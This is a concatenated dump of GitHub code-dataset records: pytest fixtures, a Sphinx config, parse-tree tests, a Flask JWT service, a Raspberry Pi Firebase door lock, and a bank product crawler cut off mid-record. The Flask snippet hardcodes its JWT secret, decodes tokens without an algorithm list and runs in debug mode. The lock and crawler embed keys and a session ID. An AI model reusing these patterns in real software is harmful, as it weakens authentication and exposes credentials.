https://docs.pytest.org/en/latest/example/simple.html#making-test-result-information-available-in-fixtures\nphase_report_key = StashKey[Dict[str, CollectReport]]()\n\n\n@pytest.hookimpl(tryfirst=True, hookwrapper=True)\ndef pytest_runtest_makereport(item, call):\n # execute all other hooks to obtain the report object\n outcome = yield\n rep = outcome.get_result()\n\n # store test results for each phase of a call, which can\n # be \"setup\", \"call\", \"teardown\"\n item.stash.setdefault(phase_report_key, {})[rep.when] = rep\n\n\n@pytest.fixture\ndef provider(request):\n if os.environ.get(\"OS_CLOUD\") is not None:\n provider = \"openstack\"\n else:\n provider = \"vagrant\"\n # raise RuntimeError(\"Openstack EnvVar cannot be found\")\n return request.getfixturevalue(provider)\n\n\n@tenacity.retry(reraise=True, stop=tenacity.stop_after_attempt(2))\ndef cluster_spawn(provider, keep_servers):\n provider.init()\n if not keep_servers:\n provider.destroy()\n provider.apply()\n\n\n@pytest.fixture\ndef cluster(request, provider, operating_system):\n keep_servers = request.config.getoption(\"keep_servers\")\n keep_after_fail = request.config.getoption(\"keep_servers_after_fail\")\n try:\n cluster_spawn(provider, keep_servers)\n yield provider.cluster()\n report = request.node.stash[phase_report_key]\n if \"call\" in report and report[\"call\"].failed:\n if not keep_after_fail:\n provider.destroy()\n elif not keep_servers:\n provider.destroy()\n except Exception:\n if not keep_after_fail:\n provider.destroy()\n","repo_name":"enix/ansible-kubeadm","sub_path":"tests/helpers/provider.py","file_name":"provider.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"44"} +{"seq_id":"30159549443","text":"\"\"\"Configuration file for the Sphinx documentation builder.\"\"\"\n# pylint: disable=invalid-name\n# For the full list of built-in configuration values, see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Project information -----------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n\nproject = \"GRSS\"\nproject_copyright = \"2023, Rahil Makadia\"\nauthor = \"Rahil Makadia\"\n# get release and version from version.txt\nwith open(\"../../grss/version.txt\", \"r\", encoding=\"utf-8\") as f:\n release = version = f.read().strip()\n\n# -- General configuration ---------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n\nextensions = [\n \"sphinx_copybutton\", # for adding copy button to code blocks\n \"sphinx.ext.autosummary\", # for generating documentation from docstrings\n \"sphinx.ext.duration\", # for printing duration when building docs\n \"sphinx.ext.napoleon\", # for parsing numpy style docstrings\n \"nbsphinx\", # for parsing jupyter notebooks\n \"sphinx_favicon\", # for adding full favicon support\n \"sphinx_gallery.load_style\", # for displaying jupyter notebook thumbnails\n]\nautosummary_generate = True\n\ntemplates_path = [\"_templates\"]\nexclude_patterns = []\n\n# -- Options for HTML output -------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n\nhtml_theme = \"sphinx_book_theme\"\nhtml_context = {\n \"default_mode\": \"light\",\n}\nhtml_theme_options = {\n \"repository_url\": \"https://github.com/rahil-makadia/grss\",\n \"repository_branch\": \"main\",\n \"path_to_docs\": \"docs\",\n \"use_download_button\": True,\n \"use_edit_page_button\": False,\n \"use_fullscreen_button\": True,\n \"use_issues_button\": True,\n \"use_repository_button\": True,\n \"use_source_button\": False,\n \"use_sidenotes\": False,\n \"home_page_in_toc\": False,\n \"show_navbar_depth\": 1,\n \"show_toc_level\": 1,\n \"logo\": {\n # Because the logo is also a homepage link,\n # including \"home\" in the alt text is good practice\n \"alt_text\": \"GRSS - Home\",\n \"text\": f\"{project} v{version} documentation\",\n },\n # \"icon_links\": [\n # {\n # \"name\": \"GitHub\",\n # \"url\": \"https://github.com/rahil-makadia/grss\",\n # \"icon\": \"fa-brands fa-github\",\n # },\n # {\n # \"name\": \"PyPI Downloads\",\n # \"url\": \"https://pypi.org/project/grss/\",\n # \"icon\": \"https://img.shields.io/pypi/dw/grss\",\n # \"type\": \"url\",\n # },\n # {\n # \"name\": \"PyPI\",\n # \"url\": \"https://pypi.org/project/grss/\",\n # \"icon\": \"fa-brands fa-python\",\n # },\n # ],\n \"extra_footer\": (\"Created using \"\n \"<a href=https://sphinx-book-theme.readthedocs.io/>\"\n \"The Sphinx Book Theme</a>.\"),\n}\nhtml_last_updated_fmt = \"%b %d, %Y\"\nhtml_logo = \"_static/grss-cropped.svg\"\nhtml_static_path = [\"_static\"]\nfavicons = [\n # generic icons compatible with most browsers\n \"favicon.ico\",\n \"favicon-32x32.png\",\n \"favicon-16x16.png\",\n {\"rel\": \"shortcut icon\", \"sizes\": \"any\", \"href\": \"favicon.ico\"},\n # chrome specific\n \"android-chrome-192x192.png\",\n # apple icons\n {\"rel\": \"mask-icon\", \"color\": \"#67b934\", \"href\": \"safari-pinned-tab.svg\"},\n {\"rel\": \"apple-touch-icon\", \"href\": \"apple-touch-icon.png\"},\n # msapplications\n {\"name\": \"msapplication-TileColor\", \"content\": \"#da532c\"},\n {\"name\": \"theme-color\", \"content\": \"#ffffff\"},\n {\"name\": \"msapplication-TileImage\", \"content\": \"mstile-310x310.png\"},\n]\nexclude_patterns = [\"**.ipynb_checkpoints\"]\n","repo_name":"rahil-makadia/grss","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70688246214","text":"#!/usr/bin/env python3\n\"\"\"\nTo run tests:\n python3 -m unittest trees_nodes_refs.py\n\n\"\"\"\nimport unittest\nimport operator\n\n\nclass BinaryTree:\n\n def __init__(self, value=None):\n self.value = value\n self.left = None\n self.right = None\n\n def insert_left(self, value):\n if not self.left:\n self.left = BinaryTree(value)\n else:\n # push existing node down one level\n tree = BinaryTree(value)\n tree.left = self.left\n self.left = tree\n\n def insert_right(self, value):\n if not self.right:\n self.right = BinaryTree(value)\n else:\n # push existing node down one level\n tree = BinaryTree(value)\n tree.right = self.right\n self.right = tree\n\n\ndef create_parse_tree(expression):\n\n # stack acts as a cursor in the construction of the tree\n stack = list()\n stack.append(BinaryTree())\n\n for token in expression:\n if token == ' ':\n pass\n elif token == '(':\n current = stack.pop()\n current.left = BinaryTree()\n stack.append(current) # return to stack\n stack.append(current.left) # make new current\n elif token == ')':\n if len(stack) == 1:\n # preserve at least one\n pass\n else:\n # goto parent\n stack.pop()\n elif token in '+-*/':\n current = stack.pop()\n current.value = token\n current.right = BinaryTree()\n stack.append(current)\n stack.append(current.right)\n elif token.isdigit():\n current = stack.pop()\n current.value = int(token)\n # stack is now at parent\n else:\n assert False, 'Unrecoginsed token'\n\n root = stack.pop()\n assert not stack, 'cursor should be @ root of tree'\n\n return root\n\n\ndef evaluate(tree):\n\n operations = {\n '+': operator.add,\n '-': operator.sub,\n '*': operator.mul,\n '/': operator.truediv,\n }\n\n if tree.left and tree.right:\n op = operations[tree.value]\n result = op(\n evaluate(tree.left),\n evaluate(tree.right)\n )\n return result\n else:\n return tree.value\n\n\nclass TestBinaryTree(unittest.TestCase):\n\n def test_can_create(self):\n\n tree = BinaryTree(0)\n\n assert tree.value == 0\n\n def test_insert_left(self):\n\n tree = BinaryTree(0)\n\n tree.insert_left(1)\n tree.left.insert_left(2)\n tree.left.left.insert_left(3)\n\n assert tree.left.value == 1\n assert tree.left.left.value == 2\n assert tree.left.left.left.value == 3\n\n def test_insert_left_pushes_down_values(self):\n\n tree = BinaryTree(0)\n\n tree.insert_left(1)\n tree.insert_left(2)\n tree.insert_left(3)\n\n assert tree.left.value == 3\n assert tree.left.left.value == 2\n assert tree.left.left.left.value == 1\n\n def test_insert_right(self):\n\n tree = BinaryTree(0)\n\n tree.insert_right(1)\n tree.right.insert_right(2)\n tree.right.right.insert_right(3)\n\n assert tree.right.value == 1\n assert tree.right.right.value == 2\n assert tree.right.right.right.value == 3\n\n def test_insert_right_pushes_down_values(self):\n\n tree = BinaryTree(0)\n\n tree.insert_right(1)\n tree.insert_right(2)\n tree.insert_right(3)\n\n assert tree.right.value == 3\n assert tree.right.right.value == 2\n assert tree.right.right.right.value == 1\n\n def test_full_binary_tree(self):\n\n # represent the following binary tree\n\n # a\n # / \\\n # b c\n # \\ | \\\n # d e f\n\n tree = BinaryTree('a')\n\n tree.insert_left('b')\n tree.left.insert_right('d')\n tree.insert_right('f')\n tree.insert_right('c') # push down 'f'\n tree.right.insert_left('e')\n\n # assertions in breadth first search order\n assert tree.value == 'a'\n\n assert tree.left.value == 'b'\n assert tree.right.value == 'c'\n\n assert tree.left.right.value == 'd'\n assert tree.right.left.value == 'e'\n assert tree.right.right.value == 'f'\n\n\nclass TestParseTree(unittest.TestCase):\n\n def test_4_plus_3(self):\n expr = \"(4 + 3)\"\n\n tree = create_parse_tree(expr)\n\n assert tree.value == \"+\"\n assert tree.left.value == 4\n assert tree.right.value == 3\n\n def test_5_plus_9(self):\n\n expr = \"(5 + 9)\"\n\n tree = create_parse_tree(expr)\n\n assert tree.value == \"+\"\n assert tree.left.value == 5\n assert tree.right.value == 9\n\n def test_nested_parenthesis(self):\n\n expr = \"((5 + 9) + (1 + 3))\"\n\n tree = create_parse_tree(expr)\n\n assert tree.value == \"+\"\n assert tree.left.value == \"+\"\n assert tree.left.left.value == 5\n assert tree.left.right.value == 9\n assert tree.right.value == \"+\"\n assert tree.right.left.value == 1\n assert tree.right.right.value == 3\n\n def test_nested_parenthesis_unsymetric(self):\n\n expr = \"(5 + (1 + 3))\"\n\n tree = create_parse_tree(expr)\n\n assert tree.value == \"+\"\n assert tree.left.value == 5\n assert tree.right.value == \"+\"\n assert tree.right.left.value == 1\n assert tree.right.right.value == 3\n\n\nclass TestEvaluateParseTree(unittest.TestCase):\n\n def test_4_plus_3(self):\n\n expr = \"(4 + 3)\"\n tree = create_parse_tree(expr)\n\n got = evaluate(tree)\n expected = 7\n\n self.assertEqual(got, expected)\n\n def test_5_plus_9(self):\n\n expr = \"(5 + 9)\"\n tree = create_parse_tree(expr)\n\n got = evaluate(tree)\n expected = 14\n\n self.assertEqual(got, expected)\n\n def test_nested_parenthesis(self):\n\n expr = \"((5 + 9) + (1 + 3))\"\n tree = create_parse_tree(expr)\n\n got = evaluate(tree)\n expected = 18\n\n self.assertEqual(got, expected)\n\n def test_nested_parenthesis_unsymetric(self):\n\n expr = \"(5 + (1 + 3))\"\n tree = create_parse_tree(expr)\n\n got = evaluate(tree)\n expected = 9\n\n self.assertEqual(got, expected)\n","repo_name":"arachnegl/algos","sub_path":"trees_nodes_refs.py","file_name":"trees_nodes_refs.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29775562707","text":"\r\nfrom flask import Flask\r\nfrom flask import request\r\nfrom logger import root\r\napp = Flask(__name__)\r\n\r\nimport time\r\nimport requests\r\nimport jwt\r\njwt_key='bnmit'\r\n\r\n\r\n\r\n@app.route('/fetch_access',methods=['GET'])\r\ndef get_access():\r\n global jwt_key\r\n\r\n url = request.args.get('url')\r\n perms = request.args.get('perms')\r\n user_id = request.args.get('user_id')\r\n user_access = {\r\n \"1\": [\"http://google.com\", \"http://facebook.com\"],\r\n \"2\": [\"http://google.com\"]\r\n }\r\n if url not in user_access[user_id]:\r\n return {\"error\": 'Invalid access'}\r\n\r\n payload={\r\n 'url':url,\r\n 'perms':perms,\r\n 'user_id':user_id\r\n }\r\n token=jwt.encode(payload,jwt_key,algorithm='HS256')\r\n return token\r\n\r\n@app.route('/check_access',methods=['GET'])\r\ndef check_access():\r\n token = request.args.get('access_token')\r\n root.info('started')\r\n payload=jwt.decode(token,jwt_key)\r\n root.info('decoding:status completd')\r\n return payload\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(port='5004',debug=True)\r\n\r\n","repo_name":"Akshay-Anand010/microservices-using-flask","sub_path":"accessprovider.py","file_name":"accessprovider.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42362104988","text":"# For files\nimport os\n\n# Deep-learning framework\nimport sys\n\nimport tensorflow as tf\n\n# Manipulate\nimport numpy as np\n\n# visualization\nimport cv2\n\n# Data directory\nfrom sklearn.preprocessing import minmax_scale\n\nINPUT_ROOT_DIR = './input/task'\nTEST_IMG_DIR = os.path.join(INPUT_ROOT_DIR, 'test')\nOUTPUT_ROOT_DIR = './output/task'\nLOG_DIR = os.path.join(OUTPUT_ROOT_DIR, 'tblogs')\nCHECKPOINT_DIR = os.path.join(OUTPUT_ROOT_DIR, 'train')\nTHRESHOLD = 0.6\n\n# 256x256으로 이미지 다운샘플링\ndef resize_image(img):\n # Read images from disk & resize\n # print('start resizing image')\n # image = cv2.imread(img)\n image = cv2.resize(img, dsize=(227, 227), interpolation=cv2.INTER_AREA)\n # print('end resizing')\n return image\n\n\ndef prediction(x, param):\n # inputs = tf.constant(x, name='inputs')\n inputs = x\n\n # layer 1\n l1_convolve = tf.nn.conv2d(input=inputs, filters=param['w1'], strides=4, padding='VALID', name='l1_convolve')\n l1_bias = tf.reshape(tf.nn.bias_add(l1_convolve, param['b1']), tf.shape(l1_convolve), name='l1_bias')\n l1_relu = tf.nn.relu6(l1_bias, name='l1_relu')\n l1_norm = tf.nn.lrn(input=l1_relu, depth_radius=5, alpha=10e-4, beta=0.75, bias=2.0, name='l1_norm')\n l1_pool = tf.nn.max_pool(input=l1_norm, ksize=3, strides=2, padding='VALID', name='l1_pool')\n\n # layer 2\n l2_convolve = tf.nn.conv2d(input=l1_pool, filters=param['w2'], strides=1, padding='SAME', name='l2_convolve')\n l2_bias = tf.reshape(tf.nn.bias_add(l2_convolve, param['b2']), tf.shape(l2_convolve), name='l2_bias')\n l2_relu = tf.nn.relu6(l2_bias, name='l2_relu')\n l2_norm = tf.nn.lrn(input=l2_relu, depth_radius=5, alpha=10e-4, beta=0.75, bias=2.0, name='l2_norm')\n l2_pool = tf.nn.max_pool(input=l2_norm, ksize=3, strides=2, padding='VALID', name='l2_pool')\n\n # layer 3\n l3_convolve = tf.nn.conv2d(input=l2_pool, filters=param['w3'], strides=1, padding='SAME', name='l3_convolve')\n l3_bias = tf.reshape(tf.nn.bias_add(l3_convolve, param['b3']), tf.shape(l3_convolve), name='l3_bias')\n l3_relu = tf.nn.relu6(l3_bias, name='l3_relu')\n\n # layer 4\n l4_convolve = tf.nn.conv2d(input=l3_relu, filters=param['w4'], strides=1, padding='SAME', name='l4_convolve')\n l4_bias = tf.reshape(tf.nn.bias_add(l4_convolve, param['b4']), tf.shape(l4_convolve), name='l4_bias')\n l4_relu = tf.nn.relu6(l4_bias, name='l4_relu')\n\n # layer 5\n l5_convolve = tf.nn.conv2d(input=l4_relu, filters=param['w5'], strides=1, padding='SAME', name='l5_convolve')\n l5_bias = tf.reshape(tf.nn.bias_add(l5_convolve, param['b5']), tf.shape(l5_convolve), name='l5_bias')\n l5_relu = tf.nn.relu6(l5_bias, name='l5_relu')\n l5_pool = tf.nn.max_pool(input=l5_relu, ksize=3, strides=2, padding='VALID', name='l5_pool')\n\n # layer 6\n l6_flattened = tf.reshape(l5_pool, [-1, tf.shape(param['w6'])[0]], name='l6_flattened')\n l6_fc = tf.nn.bias_add(tf.matmul(l6_flattened, param['w6']), param['b6'], name='l6_fc')\n l6_relu = tf.nn.relu6(l6_fc, name='l6_relu')\n\n # layer 7\n l7_fc = tf.nn.bias_add(tf.matmul(l6_relu, param['w7']), param['b7'], name='l7_fc')\n l7_relu = tf.nn.relu6(l7_fc, name='l7_relu')\n\n # layer 8\n logits = tf.nn.bias_add(tf.matmul(l7_relu, param['w8']), param['b8'], name='l8_fc')\n softmax_score = tf.nn.softmax(logits, 1)\n\n return softmax_score\n\n\ndef predict(softmax_scores, threshold=THRESHOLD):\n softmax_score = np.mean(softmax_scores, axis=0)\n\n unknown = True\n for s in softmax_score[0]:\n if s > threshold:\n unknown = False\n\n if unknown:\n return 20000\n\n else:\n predict = tf.argmax(softmax_score, 1).numpy()\n return predict\n\n\ndef load_param(ckpts_path=OUTPUT_ROOT_DIR):\n\n # 클래스명 출력을 위해 디렉토리명 저장\n dirs = list()\n\n for dir in os.walk(TEST_IMG_DIR).__next__()[1]:\n dirs.append(dir)\n\n # 저장된 trained 모델(=trained parameters) 들을 불러온 후, test set 에서 loss 계산\n models = list()\n for item in os.walk(ckpts_path).__next__()[2]:\n if item.endswith('.npz'):\n models.append(item)\n\n loaded_params = list()\n for model in models:\n loaded_param = np.load(os.path.join(ckpts_path, model), allow_pickle=True)\n loaded_param = {key: loaded_param[key].item() for key in loaded_param}\n loaded_params.append(loaded_param)\n\n return dirs, loaded_params\n\n\ndef test(image, loaded_params, dirs):\n img = resize_image(image)\n\n scores = list()\n for param in loaded_params:\n score = prediction(tf.cast(tf.reshape(img, [-1, 227, 227, 3]), dtype=tf.float32), param['arr_0'])\n scores.append(score)\n\n pred = predict(scores)\n\n if pred == 20000:\n return 'unknown'\n else:\n return dirs[pred[0]]\n\ndef minmax(img, min, max):\n # R, G, B 채널을 각각 순회하며 계산된 값을 각 픽셀마다 가감\n scaled_img = np.array(img).copy()\n for idx in range(3):\n scaled_img[..., idx] = minmax_scale(img[..., idx], feature_range=(min, max))\n\n return scaled_img\n\n\nif __name__ == \"__main__\":\n camera = cv2.VideoCapture(0);\n classes, params = load_param()\n # f, img = camera.read();\n # pred = test(image=img, loaded_param=param, dirs=classes)\n # foo = [1,2,3,4,5]\n # pred = 0\n # bar = 0\n count = 0\n\n while cv2.waitKey(1) != ord('q'):\n f, img = camera.read()\n # new = bar\n # if pred != new:\n # cv2.destroyWindow(pred)\n # cv2.destroyWindow('{}'.format(foo[pred]))\n # pred = new\n\n if count % 10 == 0:\n pred = test(minmax(img, -1.0, 1.0), params, classes)\n\n cv2.putText(img, pred, (300, 150), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2, cv2.LINE_AA)\n\n cv2.imshow('Prediction', img);\n # cv2.imshow('{}'.format(foo[pred]), img)\n # bar += 1\n count += 1\n\n camera.release()\n cv2.destroyAllWindows()\n","repo_name":"redJihun/alexNet","sub_path":"realtime_task.py","file_name":"realtime_task.py","file_ext":"py","file_size_in_byte":5927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13383504233","text":"from pyphysx import *\nfrom pyphysx_utils.rate import Rate\nfrom pyphysx_render.pyrender import PyPhysxViewer\n\nscene = Scene()\nscene.add_actor(RigidStatic.create_plane(material=Material(static_friction=0.1, dynamic_friction=0.1, restitution=0.5)))\n\nactor = RigidDynamic()\nactor.attach_shape(Shape.create_box([0.2] * 3, Material(restitution=1.)))\nactor.set_global_pose([0.5, 0.5, 1.0])\nactor.set_mass(1.)\nscene.add_actor(actor)\n\nrender = PyPhysxViewer(video_filename='videos/01_free_fall.gif')\nrender.add_physx_scene(scene)\n\nrate = Rate(240)\nwhile render.is_active:\n scene.simulate(rate.period())\n render.update()\n rate.sleep()\n","repo_name":"petrikvladimir/pyphysx","sub_path":"examples/01_free_fall.py","file_name":"01_free_fall.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"44"} +{"seq_id":"18225229860","text":"from django.core.management.base import BaseCommand\nfrom ticketing.models import Ticket\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument('top', nargs='?', type=int, default=5)\n\n def handle(self, *args, **options):\n people = {}\n for ticket in Ticket.objects.all():\n if ticket.recipient_id in people:\n people[ticket.recipient_id].append(str(ticket.pk))\n else:\n people[ticket.recipient_id] = [str(ticket.pk)]\n people_sorted = sorted(people.keys(), key=lambda person: len(people[person]), reverse=True)\n\n output_string = \"Recipients by Frequency:\\n\"\n for index, person in enumerate(people_sorted):\n output_string += f\"{person}: {', '.join(people[person])}\\n\"\n if index > options['top']:\n break\n\n histogram = {}\n print(histogram)\n output_string += \"\\nStatistics:\\n\"\n for tickets in people.values():\n num_tickets = len(tickets)\n if num_tickets in histogram:\n histogram[num_tickets] += 1\n else:\n histogram[num_tickets] = 1\n for num_tickets in sorted(histogram):\n output_string += f\"{num_tickets}: {histogram[num_tickets]}\\n\"\n\n self.stdout.write(self.style.SUCCESS(output_string))\n","repo_name":"rw-a/valentines-day","sub_path":"ticketing/management/commands/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"15960335856","text":"import RPi.GPIO as gpio\t\t# Used to connect to Raspberry Pi\nimport time\t\t\t\t\t# Used to sleep main thread for lock\nimport pyrebase\t\t\t\t# Used to connect to Firebase\n\n\ndef init():\n\t'''\n\tSetup Raspberry Pi GPIO pins.\n\n\t'''\n\tgpio.setmode(gpio.BCM)\n\tgpio.setup(17, gpio.OUT)\n\tgpio.setup(22, gpio.OUT)\n\tgpio.setup(23, gpio.OUT)\n\tgpio.setup(24, gpio.OUT)\n\ndef forward(seconds):\n\t'''\n\tMoves the motor conntect to the controller board \"forward\".\n\n\tNOTE: forward is arbitrary and depends on the connection of the + and -\n\tleads\n\n\t:param seconds: The number of seconds to sleep\n\n\t'''\n\tinit()\n\tgpio.output(17, True)\n\tgpio.output(22, False)\n\tgpio.output(23, True)\n\tgpio.output(24, False)\n\ttime.sleep(seconds)\n\tgpio.cleanup()\n\ndef backward(seconds):\n\t'''\n\tMoves the motor conntect to the controller board \"backward\".\n\n\tNOTE: backward is arbitrary and depends on the connection of the + and -\n\tleads\n\n\t:param seconds: The number of seconds to sleep\n\n\t'''\n\n\tinit()\n\tgpio.output(17, False)\n\tgpio.output(22, True)\n\tgpio.output(23, False)\n\tgpio.output(24, True)\n\ttime.sleep(seconds)\n\tgpio.cleanup()\n\n# Configuration settings for Firebase\n# These settings determine which database is connected\nconfig = {\n\t\"apiKey\": \"AIzaSyC3tcDJPD4nXPslkhZ7gscE8p9Im4Gw00s\",\n\t\"authDomain\": \"easy-lock.firebaseapp.com\",\n \t\"databaseURL\": \"https://easy-lock.firebaseio.com/\",\n \t\"storageBucket\": \"easy-lock.appspot.com\"\n}\n\nfirebase = pyrebase.initialize_app(config)\t# initialize the firebase variable\ndb = firebase.database()\t\t\t\t\t# initialize the Firebase database\nstorage = firebase.storage()\t\t\t\t# initialize the storage database\n\ndef stream_handler(data):\n\t'''\n\tHandles the data stream from Firebase. Locks and unlocks the door.\n\n\t:param message: the data from Firebase\n\n\t'''\n\n\tprint(data[\"path\"])\n\tprint(data[\"data\"])\n\tprint(data[\"event\"])\n\tif data[\"event\"] == 'patch':\n\t\tif data[\"data\"].get(\"status\", None) is True:\n\t\t\tbackward(2.5) # lock door, less than unlock to fix mechanical bug\n\t\telse:\n\t\t\tforward(2.7) # unlock door\n\n\n\n\nlock_firebase_stream = db.child(\"doors/door1\").stream(stream_handler)\n","repo_name":"PoeticPete/RaspberryPiMotor","sub_path":"pi.py","file_name":"pi.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70181708292","text":"def checker(reg, words):\n answer = 0\n direction, reg = reg\n for word in words:\n if len(reg) != len(word):\n continue\n same = False\n if direction == 'f':\n i = len(reg)\n while i >= 0:\n i -= 1\n if reg[i] == word[i]:\n continue\n\n if reg[i] == '?':\n same = True\n break\n break\n if same:\n answer += 1\n else:\n for a, b in zip(reg, word):\n if a == b:\n continue\n if a == '?':\n same = True\n break\n break\n\n if same:\n answer += 1\n return answer\n\ndef solution(words, queries):\n answer = []\n\n new_queries = list()\n for q in queries:\n if q[0] == '?':\n new_queries.append(('f', q))\n else:\n new_queries.append(('b', q))\n\n for reg in new_queries:\n answer.append(checker(reg, words))\n\n return answer\n\nprint(solution(\n [\"frodo\", \"front\", \"frost\", \"frozen\", \"frame\", \"kakao\"],\n [\"fro??\", \"????o\", \"fr???\", \"fro???\", \"pro?\"]\n))","repo_name":"yusong-offx/study-problems","sub_path":"problem/tmp2.py","file_name":"tmp2.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3827973346","text":"import json\nfrom typing import List\nfrom requests import Response\nfrom utils.crawl_request import AbstractCrawlRequest\nfrom utils.db_utils import getLocalDate\nfrom utils.mappings import FIELD_MAPPINGS\n\n\nclass GfyhCrawlRequest(AbstractCrawlRequest):\n def _prep_request(self):\n response = self.session.request(\n method='post',\n url='https://wap.cgbchina.com.cn/h5-mobilebank-app/noSessionServlet/hbss/fn10026.lgx',\n json={\"body\": {\"channel\": \"400\", \"sChannel\": \"WX\", \"prdType\": \"1\"},\n \"header\": {\"senderSN\": \"1663749151603n1009431\", \"os\": \"Win32\",\n \"channel\": \"WX\", \"secondChannel\": \"\", \"scope\": \"2\",\n \"mpSId\": \"HMBS_C882C49E556385209F40A14EC9972733_1551629178531586048\",\n \"utmSource\": \"\"}},\n headers={\"host\": \"wap.cgbchina.com.cn\",\n \"accept\": \"application/json, text/plain, */*\",\n \"origin\": \"https//wap.cgbchina.com.cn\",\n \"sendersn\": \"1663749151603n1009431\",\n \"user-agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x6307062c)\",\n \"content-type\": \"application/json;charset=UTF-8\",\n \"sec-fetch-site\": \"same-origin\",\n \"sec-fetch-mode\": \"cors\",\n \"sec-fetch-dest\": \"empty\",\n \"referer\": \"https//wap.cgbchina.com.cn/h5-mobilebank-web/h5/investment/self/list?srcChannel=WX&secondaryChannel=WX&mainChannel=400&tab=1&srcScene=GFYHGZH&channel=400&sChannel=MB&faceFlag=LS&isRegistCS=1&HMBA_STACK_HASH=1663748433050\",\n \"accept-encoding\": \"gzip, deflate, br\",\n \"accept-language\": \"zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7\"}\n )\n loads = json.loads(response.text\n .encode(response.encoding)\n .decode('utf-8', errors='ignore')\n if response.encoding\n else response.text)['body']\n for k, v in loads.items():\n if k not in self.field_value_mapping.keys():\n k = k[:-4]\n self.field_value_mapping[k] = {}\n for item in v:\n if k == 'curType':\n self.field_value_mapping[k][item['curType']] = item['curTypeName']\n elif k == 'expireType':\n self.field_value_mapping[k][item['expireType']] = item['expireTypeName']\n elif k == 'firstAmt':\n self.field_value_mapping[k][item['firstAmt']] = item['firstAmtName']\n elif k == 'investManager':\n self.field_value_mapping[k][item['investManagerNo']] = item['investManagerName']\n elif k == 'prdLimit':\n self.field_value_mapping[k][item['limitTime']] = item['limitTimeName']\n elif k == 'prdSellStatus':\n self.field_value_mapping[k][item['prdSellStatus']] = item['prdSellStatusName']\n elif k == 'riskLevel':\n self.field_value_mapping[k][item['riskLevel']] = item['riskLevelName']\n self._prep_request_flag = True\n\n def _parse_response(self, response: Response) -> List[dict]:\n resp_str = response.text.encode(response.encoding).decode('utf-8') if response.encoding else response.text\n return json.loads(resp_str)['body']['list']\n\n def _row_processor(self, row: dict) -> dict:\n return row\n\n def _if_end(self, response: Response) -> bool:\n parse_response = self._parse_response(response)\n if len(parse_response) == 0:\n return True\n\n def _row_post_processor(self, row: dict) -> dict:\n if {'yieldName', 'yieldName2', 'yieldVal2'}.issubset(row.keys()):\n if row['yieldName'] != '单位净值':\n row['yjbjjz'] = json.dumps({\n 'title': row['yieldName'],\n 'value': row['yieldVal2']\n }).encode().decode('unicode_escape')\n else:\n row['yjbjjz'] = json.dumps({\n 'title': '预期收益率',\n 'value': row['yieldVal2']\n }).encode().decode('unicode_escape')\n for key in {'yieldName', 'yieldName2', 'yieldVal2'}:\n if key in row.keys():\n del row[key]\n row['logId'] = self.log_id\n row['createTime'] = getLocalDate()\n row['crawl_from'] = 'mobile'\n if 'cpbm' not in row.keys():\n row['cpbm'] = row['cpmc']\n return row\n\n def get_json(self, page_no: int):\n return {\n \"body\": {\n \"beginNum\": (page_no - 1) * 20,\n \"fetchNum\": 20,\n \"channel\": \"400\",\n \"sChannel\": \"WX\",\n \"structDepPrdFlag\": \"N\",\n \"tagflagNew\": None,\n \"prdCycle\": \"\",\n \"firstAmt\": \"\",\n \"sortFlag\": \"0\",\n \"curType\": \"\",\n \"riskLevel\": \"\",\n \"prdManagerList\": [],\n \"expireType\": \"\",\n \"prdSellStatus\": \"\"\n },\n \"header\": {\n \"senderSN\": \"1663749151600n2005493\",\n \"os\": \"Win32\",\n \"channel\": \"WX\",\n \"secondChannel\": \"\",\n \"scope\": \"2\",\n \"mpSId\": \"HMBS_C882C49E556385209F40A14EC9972733_1551629178531586048\",\n \"utmSource\": \"\"\n }\n }\n\n def _next_request(self):\n # 需要记录一个递增的变量\n if 'page_no' not in self.kwargs.keys():\n self.kwargs['page_no'] = 1\n else:\n self.kwargs['page_no'] += 1\n self.request['json'] = self.get_json(self.kwargs['page_no'])\n\n\ngfyh_crawl_mobile = GfyhCrawlRequest(\n # 请求参数\n request={\n 'url': 'https://wap.cgbchina.com.cn/h5-mobilebank-app/noSessionServlet/hbss/fn20027.lgx',\n 'headers': {\n 'host': 'wap.cgbchina.com.cn',\n # 'content-length': 424,\n 'accept': 'application/json, text/plain, */*',\n 'origin': 'https://wap.cgbchina.com.cn',\n 'sendersn': '1663749151600n2005493',\n 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) 